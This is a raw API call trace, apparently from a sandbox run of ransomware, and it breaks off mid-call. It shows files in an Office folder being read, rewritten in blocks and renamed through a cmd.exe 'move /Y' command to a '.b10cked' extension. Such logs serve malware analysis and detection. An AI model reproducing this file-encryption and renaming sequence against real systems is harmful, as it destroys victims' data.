WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0153.233] ReleaseMutex (hMutex=0xf8) returned 1 [0153.233] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\msointl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0153.255] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.255] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x17960 [0153.255] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.255] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=21004443505) returned 1 [0153.255] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.255] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x17960 [0153.255] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.255] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.255] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x17960 [0153.255] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.256] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0153.256] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x17960 [0153.256] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0153.256] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.256] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x17960 [0153.256] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.256] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.256] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x17960 [0153.256] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.256] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.256] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x17960 [0153.256] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.256] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.256] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x17960 [0153.256] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.256] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.256] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x17960 [0153.256] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.256] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.256] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x17960 [0153.256] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.256] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x17478 [0153.256] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0153.272] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0153.272] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0153.272] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x17960 [0153.272] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0153.272] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0153.272] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0153.273] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x17960 [0153.273] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0153.273] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0153.273] ReadFile (in: hFile=0x114, lpBuffer=0x14849d8, nNumberOfBytesToRead=0xbcaf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x14849d8*, lpNumberOfBytesRead=0x12ec08*=0xbcaf, lpOverlapped=0x0) returned 1 [0153.314] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0153.314] WriteFile (in: hFile=0x114, lpBuffer=0x14849d8*, nNumberOfBytesToWrite=0xbcaf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x14849d8*, lpNumberOfBytesWritten=0x12ec1c*=0xbcaf, lpOverlapped=0x0) returned 1 [0153.315] SetFilePointer (in: hFile=0x114, lDistanceToMove=-48303, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xbcb1 [0153.315] ReadFile (in: hFile=0x114, lpBuffer=0x14849d8, nNumberOfBytesToRead=0xbcaf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x14849d8*, lpNumberOfBytesRead=0x12ec08*=0xbcaf, lpOverlapped=0x0) returned 1 [0153.317] SetFilePointer (in: hFile=0x114, lDistanceToMove=-48303, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xbcb1 [0153.317] WriteFile (in: hFile=0x114, lpBuffer=0x14849d8*, nNumberOfBytesToWrite=0xbcaf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x14849d8*, lpNumberOfBytesWritten=0x12ec1c*=0xbcaf, lpOverlapped=0x0) returned 1 [0153.322] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOINTL.DLL.trx_dll", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0153.322] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOINTL.DLL.trx_dll", cchWideChar=19, lpMultiByteStr=0x1328744, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSOINTL.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 19 [0153.322] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x17960 [0153.322] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0153.323] CloseHandle (hObject=0x114) returned 1 [0153.324] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINT~1.TRX") returned 0x3c [0153.325] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\") returned 0x30 [0153.325] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINT~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINTL.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINT~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINTL.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xe48, dwThreadId=0xfe0)) returned 1 [0153.327] CloseHandle (hObject=0x110) returned 1 [0153.327] CloseHandle (hObject=0x114) returned 1 [0153.327] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0153.327] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0153.327] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount2=52) returned 2 [0153.327] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0153.327] ReleaseMutex (hMutex=0xf8) returned 1 [0153.327] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0153.327] ReleaseMutex (hMutex=0xf8) returned 1 [0153.327] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0153.328] ReleaseMutex (hMutex=0xf8) returned 1 [0153.328] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0153.328] ReleaseMutex (hMutex=0xf8) returned 1 [0153.328] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\msointl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0153.329] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.330] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2ced60 [0153.330] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.330] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=21011886850) returned 1 [0153.330] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.330] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2ced60 [0153.330] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.330] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.330] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2ced60 [0153.330] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.330] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.330] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2ced60 [0153.330] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.330] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.330] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2ced60 [0153.330] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.330] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.330] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2ced60 [0153.331] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.331] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.331] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2ced60 [0153.331] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.331] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.331] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2ced60 [0153.331] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.331] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.331] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2ced60 [0153.331] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.331] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.331] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2ced60 [0153.331] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.331] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.331] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2ced60 [0153.331] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.331] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x2ce878 [0153.331] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0153.350] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0153.350] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0153.350] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x2ced60 [0153.350] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0153.350] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0153.350] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0153.350] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x2ced60 [0153.350] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0153.350] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0153.350] ReadFile (in: hFile=0x114, lpBuffer=0x14849d8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x14849d8*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0153.490] ReadFile (in: hFile=0x114, lpBuffer=0x14849d8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x14849d8*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0153.516] ReadFile (in: hFile=0x114, lpBuffer=0x14849d8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x14849d8*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0153.517] ReadFile (in: hFile=0x114, lpBuffer=0x14849d8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x14849d8*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0153.603] ReadFile (in: hFile=0x114, lpBuffer=0x14849d8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x14849d8*, lpNumberOfBytesRead=0x12ec08*=0x4000, lpOverlapped=0x0) returned 1 [0153.603] VirtualAlloc (lpAddress=0x0, dwSize=0x50000, flAllocationType=0x101000, flProtect=0x4) returned 0x7ff60000 [0153.608] VirtualAlloc (lpAddress=0x0, dwSize=0x50000, flAllocationType=0x101000, flProtect=0x4) returned 0x7ff10000 [0153.611] VirtualFree (lpAddress=0x7ff60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0153.613] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0153.613] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0153.613] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0153.614] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0153.614] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0153.614] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: 